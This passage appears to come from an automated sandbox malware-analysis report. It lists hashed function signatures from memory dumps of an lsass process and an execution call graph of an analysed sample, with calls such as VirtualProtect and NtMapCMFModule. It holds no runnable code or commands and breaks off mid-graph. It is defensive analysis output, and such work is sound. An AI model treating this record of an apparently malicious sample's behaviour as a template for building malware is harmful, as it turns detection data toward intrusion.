                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                          • Instruction ID: 472425e9a0a945d8f88ad4a04fa043c181074d06b5dab1dbaaebe19d85c956ef
                                                          • Opcode Fuzzy Hash: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                          • Instruction Fuzzy Hash: EF112B72615F8482EB218F25F45835977E5F788B98F584225EE8D17B58DF3CC9518B00
                                                          Function 000002D6F14E7786 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: `vector constructor iterator'$ctor closure'
                                                          • API String ID: 592178966-3792692944
                                                          • Opcode ID: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                          • Instruction ID: 6421eaac3b253b903766460ea74f787798e4bab0b4f12f5c5ce9bd20b43d90da
                                                          • Opcode Fuzzy Hash: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                          • Instruction Fuzzy Hash: FAE08661641F44D4DF058F22F48829833A4DB99B94B4991239A6D0B315FA3CD6E9C700
                                                          Function 000002D6F14E77E4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: ctor closure'$destructor iterator'
                                                          • API String ID: 592178966-595914035
                                                          • Opcode ID: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                          • Instruction ID: 3043f56b623956e0d24dd6aa4450355004b171e1966781238bfcc48730eb3f6c
                                                          • Opcode Fuzzy Hash: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                          • Instruction Fuzzy Hash: 70E08661601F44C4DF058F21E4841983364E799B94B8891238A6D0B315EA3CD5E5C300
                                                          Function 000002D6F14E78EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: std::bad_alloc::bad_alloc
                                                          • String ID: `scalar deleting destructor'$rFeaturePresent
                                                          • API String ID: 1875163511-1689945142
                                                          • Opcode ID: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                          • Instruction ID: 4145a2b33f49a0204eeba2a9ae845424453b5d6c24a68af7af6fa8d1c576e3aa
                                                          • Opcode Fuzzy Hash: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                          • Instruction Fuzzy Hash: 8CD09E22211E8599EE10EB04F88D7896334F3D4799F904413925E42EB9DF2CCF4AD750
                                                          Function 000002D6F1511C34 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                          • Instruction ID: 847c43cd6a541c41a2bc10a9def4f75ee983d8fed6796b9f9604382c83c137d8
                                                          • Opcode Fuzzy Hash: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                          • Instruction Fuzzy Hash: B8118066A01F8089EB05CF76F44C21A67A1F789FD5F694126DE4EA3B25DF3CD8428300
                                                          Function 000002D6F1511268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                          • Instruction ID: 96f73450a87a06c1df04f858679f87d5cd367a94e33e99f658e4b488cb58d552
                                                          • Opcode Fuzzy Hash: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                          • Instruction Fuzzy Hash: BBE06DB2601A808AE7048F62E80C349B7E1FB88F86F14C024CD0E07751DF7D98998740
                                                          Function 000002D6F1511000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                          • Instruction ID: 4c2064e12f9cce17a0b9e9519d123edc699b36f5fa7e42d3a40c70041ff6d4f1
                                                          • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                          • Instruction Fuzzy Hash: 33E012B26119808BE7089F62E80C359B7E1FB8CF56F548025CD0E07711DE3C9899C710

                                                          Execution Graph

                                                          Execution Coverage:2.2%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:899
                                                          Total number of Limit Nodes:2
                                                          execution_graph 2988 140001ac3 2989 140001a70 2988->2989 2990 14000199e 2989->2990 2991 140001b36 2989->2991 2994 140001b53 2989->2994 2993 140001a0f 2990->2993 2995 1400019e9 VirtualProtect 2990->2995 2992 140001ba0 4 API calls 2991->2992 2992->2994 2995->2990 2090 140001ae4 2091 140001a70 2090->2091 2092 14000199e 2091->2092 2093 140001b36 2091->2093 2096 140001b53 2091->2096 2095 140001a0f 2092->2095 2097 1400019e9 VirtualProtect 2092->2097 2098 140001ba0 2093->2098 2097->2092 2099 140001bc2 2098->2099 2101 140001c45 VirtualQuery 2099->2101 2102 140001cf4 2099->2102 2105 140001c04 memcpy 2099->2105 2101->2102 2107 140001c72 2101->2107 2103 140001d23 GetLastError 2102->2103 2104 140001d37 2103->2104 2105->2096 2106 140001ca4 VirtualProtect 2106->2103 2106->2105 2107->2105 2107->2106 2135 140001404 2208 140001394 2135->2208 2137 140001413 2138 140001394 2 API calls 2137->2138 2139 140001422 2138->2139 2140 140001394 2 API calls 2139->2140 2141 140001431 2140->2141 2142 140001394 2 API calls 2141->2142 2143 140001440 2142->2143 2144 140001394 2 API calls 2143->2144 2145 14000144f 2144->2145 2146 140001394 2 API calls 2145->2146 2147 14000145e 2146->2147 2148 140001394 2 API calls 2147->2148 2149 14000146d 2148->2149 2150 140001394 2 API calls 2149->2150 2151 14000147c 2150->2151 2152 140001394 2 API calls 2151->2152 2153 14000148b 2152->2153 2154 140001394 2 API calls 2153->2154 2155 14000149a 2154->2155 2156 140001394 2 API calls 2155->2156 2157 1400014a9 2156->2157 2158 140001394 2 API calls 2157->2158 2159 1400014b8 2158->2159 2160 140001394 2 API calls 2159->2160 2161 1400014c7 2160->2161 2162 140001394 2 API calls 2161->2162 2163 1400014d6 2162->2163 2164 1400014e5 2163->2164 2165 140001394 2 API calls 2163->2165 2166 140001394 2 API calls 2164->2166 2165->2164 2167 1400014ef 2166->2167 2168 1400014f4 2167->2168 2169 140001394 2 API calls 2167->2169 2170 140001394 2 API calls 2168->2170 2169->2168 2171 1400014fe 2170->2171 2172 140001503 2171->2172 2173 140001394 2 API calls 2171->2173 2174 140001394 2 API calls 2172->2174 2173->2172 2175 14000150d 2174->2175 2176 140001394 2 API calls 2175->2176 2177 140001512 2176->2177 2178 140001394 2 API calls 2177->2178 2179 140001521 2178->2179 2180 140001394 2 API calls 2179->2180 2181 140001530 2180->2181 2182 140001394 2 API calls 2181->2182 2183 14000153f 2182->2183 2184 140001394 2 API calls 2183->2184 2185 14000154e 2184->2185 2186 140001394 2 API calls 2185->2186 2187 14000155d 2186->2187 2188 140001394 2 API calls 2187->2188 2189 14000156c 2188->2189 2190 140001394 2 API calls 2189->2190 2191 14000157b 2190->2191 2192 140001394 2 API calls 2191->2192 2193 14000158a 2192->2193 2194 140001394 2 API calls 2193->2194 2195 140001599 2194->2195 2196 140001394 2 API calls 2195->2196 2197 1400015a8 2196->2197 2198 140001394 2 API calls 2197->2198 2199 1400015b7 2198->2199 2200 140001394 2 API calls 2199->2200 2201 1400015c6 2200->2201 2202 140001394 2 API calls 2201->2202 2203 1400015d5 2202->2203 2204 140001394 2 API calls 2203->2204 2205 1400015e4 2204->2205 2206 140001394 2 API calls 2205->2206 2207 1400015f3 2206->2207 2209 140006670 malloc 2208->2209 2210 1400013b8 2209->2210 2211 1400013c6 NtMapCMFModule 2210->2211 2211->2137 2212 140002104 2213 140002111 EnterCriticalSection 2212->2213 2218 140002218 2212->2218 2214 14000220b LeaveCriticalSection 2213->2214 2220 14000212e 2213->2220 2214->2218 2215 140002272 2216 14000214d TlsGetValue GetLastError 2216->2220 2217 140002241 DeleteCriticalSection 2217->2215 2218->2215 2218->2217 2219 140002230 free 2218->2219 2219->2217 2219->2219 2220->2214 2220->2216 2108 140001e65 2109 140001e67 signal 2108->2109 2110 140001e7c 2109->2110 2112 140001e99 2109->2112 2111 140001e82 signal 2110->2111 2110->2112 2111->2112 2996 140001f47 2997 140001e67 signal 2996->2997 2998 140001e99 2996->2998 2997->2998 2999 140001e7c 2997->2999 2999->2998 3000 140001e82 signal 2999->3000 3000->2998 2113 14000216f 2114 140002185 2113->2114 2115 140002178 InitializeCriticalSection 2113->2115 2115->2114 2116 140001a70 2117 14000199e 2116->2117 2121 140001a7d 2116->2121 2118 140001a0f 2117->2118 2119 1400019e9 VirtualProtect 2117->2119 2119->2117 2120 140001b53 2121->2116 2121->2120 2122 140001b36 2121->2122 2123 140001ba0 4 API calls 2122->2123 2123->2120 2221 140001e10 2222 140001e2f 2221->2222 2223 140001ecc 2222->2223 2227 140001eb5 2222->2227 2228 140001e55 2222->2228 2224 140001ed3 signal 2223->2224 2223->2227 2225 140001ee4 2224->2225 2224->2227 2226 140001eea signal 2225->2226 2225->2227 2226->2227 2228->2227 2229 140001f12 signal 2228->2229 2229->2227 3001 140002050 3002 14000205e EnterCriticalSection 3001->3002 3003 1400020cf 3001->3003 3004 1400020c2 LeaveCriticalSection 3002->3004 3005 140002079 3002->3005 3004->3003 3005->3004 3006 1400020bd free 3005->3006 3006->3004 3007 140001fd0 3008 140001fe4 3007->3008 3009 140002033 3007->3009 3008->3009 3010 140001ffd EnterCriticalSection LeaveCriticalSection 3008->3010 3010->3009 2238 140001ab3 2239 140001a70 2238->2239 2239->2238 2240 140001b36 2239->2240 2242 14000199e 2239->2242 2245 140001b53 2239->2245 2241 140001ba0 4 API calls 2240->2241 2241->2245 2243 140001a0f 2242->2243 2244 1400019e9 VirtualProtect 2242->2244 2244->2242 2080 140001394 2084 140006670 2080->2084 2082 1400013b8 2083 1400013c6 NtMapCMFModule 2082->2083 2085 14000668e 2084->2085 2088 1400066bb 2084->2088 2085->2082 2086 140006763 2087 14000677f malloc 2086->2087 2089 1400067a0 2087->2089 2088->2085 2088->2086 2089->2085 2230 14000219e 2231 140002272 2230->2231 2232 1400021ab EnterCriticalSection 2230->2232 2233 140002265 LeaveCriticalSection 2232->2233 2235 1400021c8 2232->2235 2233->2231 2234 1400021e9 TlsGetValue GetLastError 2234->2235 2235->2233 2235->2234 2124 140001800 2125 140001812 2124->2125 2126 140001835 fprintf 2125->2126 2127 140001000 2128 14000108b __set_app_type 2127->2128 2129 140001040 2127->2129 2131 1400010b6 2128->2131 2129->2128 2130 1400010e5 2131->2130 2133 140001e00 2131->2133 2134 140006c10 __setusermatherr 2133->2134 2236 140002320 strlen 2237 140002337 2236->2237 2246 140001140 2249 140001160 2246->2249 2248 140001156 2250 1400011b9 2249->2250 2251 14000118b 2249->2251 2252 1400011d3 2250->2252 2253 1400011c7 _amsg_exit 2250->2253 2251->2250 2254 1400011a0 Sleep 2251->2254 2255 140001201 _initterm 2252->2255 2256 14000121a 2252->2256 2253->2252 2254->2250 2254->2251 2255->2256 2272 140001880 2256->2272 2259 14000126a 2260 14000126f malloc 2259->2260 2261 14000128b 2260->2261 2263 1400012d0 2260->2263 2262 1400012a0 strlen malloc memcpy 2261->2262 2262->2262 2262->2263 2283 140003250 2263->2283 2265 140001315 2266 140001344 2265->2266 2267 140001324 2265->2267 2270 140001160 78 API calls 2266->2270 2268 140001338 2267->2268 2269 14000132d _cexit 2267->2269 2268->2248 2269->2268 2271 140001366 2270->2271 2271->2248 2273 140001247 SetUnhandledExceptionFilter 2272->2273 2274 1400018a2 2272->2274 2273->2259 2274->2273 2275 14000194d 2274->2275 2279 140001a20 2274->2279 2276 14000199e 2275->2276 2277 140001ba0 4 API calls 2275->2277 2276->2273 2278 1400019e9 VirtualProtect 2276->2278 2277->2275 2278->2276 2279->2276 2280 140001b53 2279->2280 2281 140001b36 2279->2281 2282 140001ba0 4 API calls 2281->2282 2282->2280 2286 140003266 2283->2286 2284 1400033c1 wcslen 2395 14000153f 2284->2395 2286->2284 2288 1400035be 2288->2265 2291 1400034bc 2294 1400034e2 memset 2291->2294 2297 140003514 2294->2297 2296 140003564 wcslen 2298 14000357a 2296->2298 2302 1400035bc 2296->2302 2297->2296 2299 140003590 _wcsnicmp 2298->2299 2300 1400035a6 wcslen 2299->2300 2299->2302 2300->2299 2300->2302 2301 140003681 wcscpy wcscat memset 2304 1400036c0 2301->2304 2302->2301 2303 140003703 wcscpy wcscat memset 2305 140003746 2303->2305 2304->2303 2306 14000384e wcscpy wcscat memset 2305->2306 2307 140003890 2306->2307 2308 140003be5 wcslen 2307->2308 2309 140003bf3 2308->2309 2313 140003c2b 2308->2313 2310 140003c00 _wcsnicmp 2309->2310 2311 140003c16 wcslen 2310->2311 2310->2313 2311->2310 2311->2313 2312 140003ce2 wcscpy wcscat memset 2315 140003d24 2312->2315 2313->2312 2314 140003d67 wcscpy wcscat memset 2316 140003dad 2314->2316 2315->2314 2317 140003ddd wcscpy wcscat 2316->2317 2318 1400061b3 memcpy 2317->2318 2320 140003e0f 2317->2320 2318->2320 2319 140003f62 wcslen 2322 140003fa7 2319->2322 2320->2319 2321 14000400c wcslen memset 2535 14000157b 2321->2535 2322->2321 2324 14000468f memset 2326 1400046be 2324->2326 2325 140004703 wcscpy wcscat wcslen 2576 14000146d 2325->2576 2326->2325 2330 140004679 2331 14000145e 2 API calls 2330->2331 2334 140004674 2331->2334 2332 1400048a3 2339 1400048e2 memset 2332->2339 2333 14000157b 2 API calls 2369 140004135 2333->2369 2334->2324 2337 140004813 2662 1400014a9 2337->2662 2338 1400048bf 2341 14000145e 2 API calls 2338->2341 2343 140006294 2339->2343 2344 140004906 wcscpy wcscat wcslen 2339->2344 2341->2332 2386 140004a30 2344->2386 2347 1400048af 2352 14000145e 2 API calls 2347->2352 2348 14000145e 2 API calls 2348->2369 2350 1400044a4 _wcsnicmp 2354 14000465c 2350->2354 2350->2369 2352->2332 2356 14000145e 2 API calls 2354->2356 2355 140004897 2357 14000145e 2 API calls 2355->2357 2360 140004668 2356->2360 2357->2332 2358 140004502 _wcsnicmp 2358->2354 2358->2369 2359 140004b29 wcslen 2361 14000153f 2 API calls 2359->2361 2362 14000145e 2 API calls 2360->2362 2361->2386 2362->2334 2363 140005e3f memcpy 2363->2386 2364 140004556 _wcsnicmp 2364->2354 2364->2369 2365 14000145e NtMapCMFModule malloc 2365->2386 2366 140004c9d wcslen 2370 14000153f 2 API calls 2366->2370 2367 140004327 wcsstr 2367->2354 2367->2369 2368 140005f7c memcpy 2368->2386 2369->2324 2369->2330 2369->2333 2369->2348 2369->2350 2369->2358 2369->2364 2369->2367 2552 140001599 2369->2552 2565 1400015a8 2369->2565 2370->2386 2371 14000515d wcslen 2373 14000153f 2 API calls 2371->2373 2372 140004ef1 wcslen 2374 14000157b 2 API calls 2372->2374 2373->2386 2374->2386 2375 140005ad1 wcscpy wcscat wcslen 2378 140001422 2 API calls 2375->2378 2376 140005fb4 memcpy 2376->2386 2377 140004f74 memset 2377->2386 2378->2386 2379 140004fde wcslen 2380 1400015a8 2 API calls 2379->2380 2380->2386 2383 140005046 _wcsnicmp 2383->2386 2384 140005c1c 2384->2265 2385 140005cc7 wcslen 2387 1400015a8 2 API calls 2385->2387 2386->2359 2386->2363 2386->2365 2386->2366 2386->2368 2386->2371 2386->2372 2386->2375 2386->2376 2386->2377 2386->2379 2386->2383 2386->2384 2386->2385 2388 140005874 memset 2386->2388 2389 1400027d0 11 API calls 2386->2389 2390 140005a70 memset 2386->2390 2391 1400060a6 memcpy 2386->2391 2392 1400058db memset 2386->2392 2393 140005935 wcscpy wcscat wcslen 2386->2393 2778 1400014d6 2386->2778 2823 140001521 2386->2823 2921 140001431 2386->2921 2387->2386 2388->2386 2388->2390 2389->2386 2390->2386 2391->2386 2392->2386 2852 140001422 2393->2852 2396 140001394 2 API calls 2395->2396 2397 14000154e 2396->2397 2398 140001394 2 API calls 2397->2398 2399 14000155d 2398->2399 2400 140001394 2 API calls 2399->2400 2401 14000156c 2400->2401 2402 140001394 2 API calls 2401->2402 2403 14000157b 2402->2403 2404 140001394 2 API calls 2403->2404 2405 14000158a 2404->2405 2406 140001394 2 API calls 2405->2406 2407 140001599 2406->2407 2408 140001394 2 API calls 2407->2408 2409 1400015a8 2408->2409 2410 140001394 2 API calls 2409->2410 2411 1400015b7 2410->2411 2412 140001394 2 API calls 2411->2412 2413 1400015c6 2412->2413 2414 140001394 2 API calls 2413->2414 2415 1400015d5 2414->2415 2416 140001394 2 API calls 2415->2416 2417 1400015e4 2416->2417 2418 140001394 2 API calls 2417->2418 2419 1400015f3 2418->2419 2419->2288 2420 140001503 2419->2420 2421 140001394 2 API calls 2420->2421 2422 14000150d 2421->2422 2423 140001394 2 API calls 2422->2423 2424 140001512 2423->2424 2425 140001394 2 API calls 2424->2425 2426 140001521 2425->2426 2427 140001394 2 API calls 2426->2427 2428 140001530 2427->2428 2429 140001394 2 API calls 2428->2429 2430 14000153f 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000154e 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000155d 2433->2434 2435 140001394 2 API calls 2434->2435 2436 14000156c 2435->2436 2437 140001394 2 API calls 2436->2437 2438 14000157b 2437->2438 2439 140001394 2 API calls 2438->2439 2440 14000158a 2439->2440 2441 140001394 2 API calls 2440->2441 2442 140001599 2441->2442 2443 140001394 2 API calls 2442->2443 2444 1400015a8 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015b7 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015c6 2447->2448 2449 140001394 2 API calls 2448->2449 2450 1400015d5 2449->2450 2451 140001394 2 API calls 2450->2451 2452 1400015e4 2451->2452 2453 140001394 2 API calls 2452->2453 2454 1400015f3 2453->2454 2454->2291 2455 14000156c 2454->2455 2456 140001394 2 API calls 2455->2456 2457 14000157b 2456->2457 2458 140001394 2 API calls 2457->2458 2459 14000158a 2458->2459 2460 140001394 2 API calls 2459->2460 2461 140001599 2460->2461 2462 140001394 2 API calls 2461->2462 2463 1400015a8 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015b7 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015c6 2466->2467 2468 140001394 2 API calls 2467->2468 2469 1400015d5 2468->2469 2470 140001394 2 API calls 2469->2470 2471 1400015e4 2470->2471 2472 140001394 2 API calls 2471->2472 2473 1400015f3 2472->2473 2473->2291 2474 14000145e 2473->2474 2475 140001394 2 API calls 2474->2475 2476 14000146d 2475->2476 2477 140001394 2 API calls 2476->2477 2478 14000147c 2477->2478 2479 140001394 2 API calls 2478->2479 2480 14000148b 2479->2480 2481 140001394 2 API calls 2480->2481 2482 14000149a 2481->2482 2483 140001394 2 API calls 2482->2483 2484 1400014a9 2483->2484 2485 140001394 2 API calls 2484->2485 2486 1400014b8 2485->2486 2487 140001394 2 API calls 2486->2487 2488 1400014c7 2487->2488 2489 140001394 2 API calls 2488->2489 2490 1400014d6 2489->2490 2491 1400014e5 2490->2491 2492 140001394 2 API calls 2490->2492 2493 140001394 2 API calls 2491->2493 2492->2491 2494 1400014ef 2493->2494 2495 1400014f4 2494->2495 2496 140001394 2 API calls 2494->2496 2497 140001394 2 API calls 2495->2497 2496->2495 2498 1400014fe 2497->2498 2499 140001503 2498->2499 2500 140001394 2 API calls 2498->2500 2501 140001394 2 API calls 2499->2501 2500->2499 2502 14000150d 2501->2502 2503 140001394 2 API calls 2502->2503 2504 140001512 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001521 2505->2506 2507 140001394 2 API calls 2506->2507 2508 140001530 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000153f 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000154e 2511->2512 2513 140001394 2 API calls 2512->2513 2514 14000155d 2513->2514 2515 140001394 2 API calls 2514->2515 2516 14000156c 2515->2516 2517 140001394 2 API calls 2516->2517 2518 14000157b 2517->2518 2519 140001394 2 API calls 2518->2519 2520 14000158a 2519->2520 2521 140001394 2 API calls 2520->2521 2522 140001599 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015a8 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015b7 2525->2526 2527 140001394 2 API calls 2526->2527 2528 1400015c6 2527->2528 2529 140001394 2 API calls 2528->2529 2530 1400015d5 2529->2530 2531 140001394 2 API calls 2530->2531 2532 1400015e4 2531->2532 2533 140001394 2 API calls 2532->2533 2534 1400015f3 2533->2534 2534->2291 2536 140001394 2 API calls 2535->2536 2537 14000158a 2536->2537 2538 140001394 2 API calls 2537->2538 2539 140001599 2538->2539 2540 140001394 2 API calls 2539->2540 2541 1400015a8 2540->2541 2542 140001394 2 API calls 2541->2542 2543 1400015b7 2542->2543 2544 140001394 2 API calls 2543->2544 2545 1400015c6 2544->2545 2546 140001394 2 API calls 2545->2546 2547 1400015d5 2546->2547 2548 140001394 2 API calls 2547->2548 2549 1400015e4 2548->2549 2550 140001394 2 API calls 2549->2550 2551 1400015f3 2550->2551 2551->2369 2553 140001394 2 API calls 2552->2553 2554 1400015a8 2553->2554 2555 140001394 2 API calls 2554->2555 2556 1400015b7 2555->2556 2557 140001394 2 API calls 2556->2557 2558 1400015c6 2557->2558 2559 140001394 2 API calls 2558->2559 2560 1400015d5 2559->2560 2561 140001394 2 API calls 2560->2561 2562 1400015e4 2561->2562 2563 140001394 2 API calls 2562->2563 2564 1400015f3 2563->2564 2564->2369 2566 140001394 2 API calls 2565->2566 2567 1400015b7 2566->2567 2568 140001394 2 API calls 2567->2568 2569 1400015c6 2568->2569 2570 140001394 2 API calls 2569->2570 2571 1400015d5 2570->2571 2572 140001394 2 API calls 2571->2572 2573 1400015e4 2572->2573 2574 140001394 2 API calls 2573->2574 2575 1400015f3 2574->2575 2575->2369 2577 140001394 2 API calls 2576->2577 2578 14000147c 2577->2578 2579 140001394 2 API calls 2578->2579 2580 14000148b 2579->2580 2581 140001394 2 API calls 2580->2581 2582 14000149a 2581->2582 2583 140001394 2 API calls 2582->2583 2584 1400014a9 2583->2584 2585 140001394 2 API calls 2584->2585 2586 1400014b8 2585->2586 2587 140001394 2 API calls 2586->2587 2588 1400014c7 2587->2588 2589 140001394 2 API calls 2588->2589 2590 1400014d6 2589->2590 2591 1400014e5 2590->2591 2592 140001394 2 API calls 2590->2592 2593 140001394 2 API calls 2591->2593 2592->2591 2594 1400014ef 2593->2594 2595 1400014f4 2594->2595 2596 140001394 2 API calls 2594->2596 2597 140001394 2 API calls 2595->2597 2596->2595 2598 1400014fe 2597->2598 2599 140001503 2598->2599 2600 140001394 2 API calls 2598->2600 2601 140001394 2 API calls 2599->2601 2600->2599 2602 14000150d 2601->2602 2603 140001394 2 API calls 2602->2603 2604 140001512 2603->2604 2605 140001394 2 API calls 2604->2605 2606 140001521 2605->2606 2607 140001394 2 API calls 2606->2607 2608 140001530 2607->2608 2609 140001394 2 API calls 2608->2609 2610 14000153f 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000154e 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000155d 2613->2614 2615 140001394 2 API calls 2614->2615 2616 14000156c 2615->2616 2617 140001394 2 API calls 2616->2617 2618 14000157b 2617->2618 2619 140001394 2 API calls 2618->2619 2620 14000158a 2619->2620 2621 140001394 2 API calls 2620->2621 2622 140001599 2621->2622 2623 140001394 2 API calls 2622->2623 2624 1400015a8 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015b7 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015c6 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015d5 2629->2630 2631 140001394 2 API calls 2630->2631 2632 1400015e4 2631->2632 2633 140001394 2 API calls 2632->2633 2634 1400015f3 2633->2634 2634->2332 2635 140001530 2634->2635 2636 140001394 2 API calls 2635->2636 2637 14000153f 2636->2637 2638 140001394 2 API calls 2637->2638 2639 14000154e 2638->2639 2640 140001394 2 API calls 2639->2640 2641 14000155d 2640->2641 2642 140001394 2 API calls 2641->2642 2643 14000156c 2642->2643 2644 140001394 2 API calls 2643->2644 2645 14000157b 2644->2645 2646 140001394 2 API calls 2645->2646 2647 14000158a 2646->2647 2648 140001394 2 API calls 2647->2648 2649 140001599 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015a8 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015b7 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015c6 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015d5 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015e4 2658->2659 2660 140001394 2 API 